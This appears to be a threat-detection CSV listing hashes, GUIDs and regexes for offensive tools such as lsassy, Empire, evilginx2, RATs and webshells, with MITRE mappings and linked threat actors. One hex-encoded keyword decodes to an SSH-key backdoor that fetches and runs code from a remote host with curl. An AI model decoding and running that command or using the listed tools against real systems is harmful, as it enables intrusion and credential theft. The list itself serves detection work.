"*5a9924bf1bd43eaa25685fa21d111909aeab2952b8c7eb67aad1b2ec43b4054c*",".{0,1000}5a9924bf1bd43eaa25685fa21d111909aeab2952b8c7eb67aad1b2ec43b4054c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27263"
"*5A9955E4-62B7-419D-AB73-01A6D7DD27FC*",".{0,1000}5A9955E4\-62B7\-419D\-AB73\-01A6D7DD27FC.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","#GUIDproject","N/A","6","5","487","113","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z","27264"
"*5a9b8cfd138823a0d9799afc9eb70f28ec2ede90a1db1fde81d8bd70e5613fba*",".{0,1000}5a9b8cfd138823a0d9799afc9eb70f28ec2ede90a1db1fde81d8bd70e5613fba.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","27265"
"*5aa96be2191beac9ae36173638b5d98d6ce133676c42438f2c8d86f22c2b2232*",".{0,1000}5aa96be2191beac9ae36173638b5d98d6ce133676c42438f2c8d86f22c2b2232.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","27267"
"*5aaed5c8657383a894443a92a259182d9dc2c01de72a80460fff4a636e20c65b*",".{0,1000}5aaed5c8657383a894443a92a259182d9dc2c01de72a80460fff4a636e20c65b.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","27268"
"*5ab9136f9d920429f7a993e7f0b6d18d27338fd18952695a13a93224f3c680a3*",".{0,1000}5ab9136f9d920429f7a993e7f0b6d18d27338fd18952695a13a93224f3c680a3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27270"
"*5abf8e18a6a5c164568a7391b6379c9693cdefb90856ff19204a13d557f896d8*",".{0,1000}5abf8e18a6a5c164568a7391b6379c9693cdefb90856ff19204a13d557f896d8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27272"
"*5AC309CE-1223-4FF5-AF84-24BCD0B9E4DC*",".{0,1000}5AC309CE\-1223\-4FF5\-AF84\-24BCD0B9E4DC.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","#GUIDproject","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","27273"
"*5ac428505ae4b2a4c7a9b0a03bc948ae7cf0be5c5e7348b9f6303cd2acd8aa36*",".{0,1000}5ac428505ae4b2a4c7a9b0a03bc948ae7cf0be5c5e7348b9f6303cd2acd8aa36.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27274"
"*5ac7b2c9c03ec6be6c8e0ea6ffd0b9ca0c69a8f2472d3e183780bfc6f86fc7f6*",".{0,1000}5ac7b2c9c03ec6be6c8e0ea6ffd0b9ca0c69a8f2472d3e183780bfc6f86fc7f6.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#filehash","N/A","10","","N/A","","","","27275"
"*5ada70505b8a57566ca4cd20445cb38967d9884316537c26ef81e9ae125b29a6*",".{0,1000}5ada70505b8a57566ca4cd20445cb38967d9884316537c26ef81e9ae125b29a6.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","27278"
"*5ae17ceeb8dcfb5eb56fc27876c5047ddfebcb9114beb0a03db81000c46d7054*",".{0,1000}5ae17ceeb8dcfb5eb56fc27876c5047ddfebcb9114beb0a03db81000c46d7054.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27280"
"*5ae72041c418f217c872a9935c29da95d0925fc6eca321e92e33bd60ae526b91*",".{0,1000}5ae72041c418f217c872a9935c29da95d0925fc6eca321e92e33bd60ae526b91.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27281"
"*5ae9e28dda38df5a339e0f02d4b318e9e6e48a9abe916bb4161a80c7eac0da1f*",".{0,1000}5ae9e28dda38df5a339e0f02d4b318e9e6e48a9abe916bb4161a80c7eac0da1f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27282"
"*5aeb6c478edb98ee7903a2a96fe78bf213ceac7ca60ba242dfb7c83d8035aa85*",".{0,1000}5aeb6c478edb98ee7903a2a96fe78bf213ceac7ca60ba242dfb7c83d8035aa85.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","#filehash","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","27283"
"*5aee45e43a812457c217265c069ac658d6a2cd5beb44ee73dfb881a73b02c203*",".{0,1000}5aee45e43a812457c217265c069ac658d6a2cd5beb44ee73dfb881a73b02c203.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","27284"
"*5aef3aec6cf7fd4f2a1b1f82768092cf7c861f3f4efb8d7b1764c51f4620e946*",".{0,1000}5aef3aec6cf7fd4f2a1b1f82768092cf7c861f3f4efb8d7b1764c51f4620e946.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","27286"
"*5af1ddffa20fbda387dd0a7454808a98be0a72c6efb977a4330beadb5ed438cd*",".{0,1000}5af1ddffa20fbda387dd0a7454808a98be0a72c6efb977a4330beadb5ed438cd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27287"
"*5afab0c6f13f93b77c833816fd067007f9a0770ff0ce5096b55635fa3d9b96b4*",".{0,1000}5afab0c6f13f93b77c833816fd067007f9a0770ff0ce5096b55635fa3d9b96b4.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","0","#filehash","N/A","8","1","0","1","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z","27288"
"*5afdada4e30699db8a1903e8a57fb9b50783299b1a8606f145a56e15fa1a9521*",".{0,1000}5afdada4e30699db8a1903e8a57fb9b50783299b1a8606f145a56e15fa1a9521.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","27289"
"*5b00508d81b77ecbd0d6c8defc6fc291dd60efa895a1161fdfa168fbb46096df*",".{0,1000}5b00508d81b77ecbd0d6c8defc6fc291dd60efa895a1161fdfa168fbb46096df.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","27292"
"*5b020af1ed925fa5f405807ccf366f99a771702ac120da1a7ef11d1b0f6d1981*",".{0,1000}5b020af1ed925fa5f405807ccf366f99a771702ac120da1a7ef11d1b0f6d1981.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27293"
"*5b05501598f6428054255538a2fedd435e439408e77f8b426c31b83597460565*",".{0,1000}5b05501598f6428054255538a2fedd435e439408e77f8b426c31b83597460565.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27295"
"*5b08506beace8cb3c07dbab702e9d487eda75084fd80bc6054445adc4bffbb15*",".{0,1000}5b08506beace8cb3c07dbab702e9d487eda75084fd80bc6054445adc4bffbb15.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27296"
"*5b0880987e5159342e78b77b382eec3cd12365cf2150ed486ebf17dca71902b3*",".{0,1000}5b0880987e5159342e78b77b382eec3cd12365cf2150ed486ebf17dca71902b3.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27297"
"*5b095728389373e05a038fea724aa2dd66c3ff68b830cc651fd92177afe8c8b3*",".{0,1000}5b095728389373e05a038fea724aa2dd66c3ff68b830cc651fd92177afe8c8b3.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","27298"
"*5b14b133f4421557781cf8765d8a16bb5a6ca90ef5606dee10af7eee3107a18f*",".{0,1000}5b14b133f4421557781cf8765d8a16bb5a6ca90ef5606dee10af7eee3107a18f.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","27301"
"*5b1ce3529f7881a1252086a73bdbb45d6e9debb50f92b9c42fad341e34146437*",".{0,1000}5b1ce3529f7881a1252086a73bdbb45d6e9debb50f92b9c42fad341e34146437.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","27303"
"*5b27fd5a98641cb68ad21f6be75f49291b0cc08fa091af2ba15ef3af0a3e22a2*",".{0,1000}5b27fd5a98641cb68ad21f6be75f49291b0cc08fa091af2ba15ef3af0a3e22a2.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","27306"
"*5b2ec674-0aa4-4209-94df-b6c995ad59c4*",".{0,1000}5b2ec674\-0aa4\-4209\-94df\-b6c995ad59c4.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","27307"
"*5b313e80767783165c9f99079a6210582b5f57fe4c3f34ab2c5d27e6b1a09695*",".{0,1000}5b313e80767783165c9f99079a6210582b5f57fe4c3f34ab2c5d27e6b1a09695.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27308"
"*5b32dad4ad2b350157eda3061dc821645e7cd291970509ab32e9023b8c945951*",".{0,1000}5b32dad4ad2b350157eda3061dc821645e7cd291970509ab32e9023b8c945951.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#filehash","N/A","10","","N/A","","","","27309"
"*5b36e42494ab562f7adb9c5dbf17761300050efd24c1c9c61dcb82e5bb628840*",".{0,1000}5b36e42494ab562f7adb9c5dbf17761300050efd24c1c9c61dcb82e5bb628840.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","#filehash","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","27310"
"*5b3811e463d5b424593910cbf7fd06218e993f8399a9add27b053f98bc984587*",".{0,1000}5b3811e463d5b424593910cbf7fd06218e993f8399a9add27b053f98bc984587.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27311"
"*5b4300844bcd004ff1d5415a81dde48c9b3505338e8ff1b8bdaeb5f89c415b46*",".{0,1000}5b4300844bcd004ff1d5415a81dde48c9b3505338e8ff1b8bdaeb5f89c415b46.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27314"
"*5b46050219c918b47dc271a458450d384c4691f9ff96d174856946ff3fadffa9*",".{0,1000}5b46050219c918b47dc271a458450d384c4691f9ff96d174856946ff3fadffa9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27315"
"*5b46bed3c8b76ee3d3b76dbd1dd5c45d79a6a623889aca85917c8777b12cdc86*",".{0,1000}5b46bed3c8b76ee3d3b76dbd1dd5c45d79a6a623889aca85917c8777b12cdc86.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27317"
"*5b4dd71b0d9ac18c80db2eb0149e56af6b01533ff1e7a28359ca2f61ee0f8c8c*",".{0,1000}5b4dd71b0d9ac18c80db2eb0149e56af6b01533ff1e7a28359ca2f61ee0f8c8c.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","27318"
"*5b52db9764212c3b11863100f5f6d34ad13af621fe9897edcea2392b39b2b70e*",".{0,1000}5b52db9764212c3b11863100f5f6d34ad13af621fe9897edcea2392b39b2b70e.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","27319"
"*5b55d8a0b50b89156ef7d09cffede9385fdad53301c16f2570a1888e7ee1cdf7*",".{0,1000}5b55d8a0b50b89156ef7d09cffede9385fdad53301c16f2570a1888e7ee1cdf7.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","#filehash","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","27322"
"*5b5b20242873746174202d632559202f62696e2f73682920213d20242873746174202d632559202e73736829205d5d202626207b203a3b746f756368202d72202f62696e2f7368202e7373683b6578706f7274204b45593d22223b62617368202d63202224286375726c202d6673534c207468632e6f72672f737368782922*",".{0,1000}5b5b20242873746174202d632559202f62696e2f73682920213d20242873746174202d632559202e73736829205d5d202626207b203a3b746f756368202d72202f62696e2f7368202e7373683b6578706f7274204b45593d22223b62617368202d63202224286375726c202d6673534c207468632e6f72672f737368782922.{0,1000}","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider* - FANCY BEAR","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","27323"
"*5b5ec9cb61bbc187ad3ffdfaa6d782525d9574c9b3fcd5e694f0d25d60531074*",".{0,1000}5b5ec9cb61bbc187ad3ffdfaa6d782525d9574c9b3fcd5e694f0d25d60531074.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27324"
"*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27325"
"*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27326"
"*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27327"
"*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27328"
"*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27329"
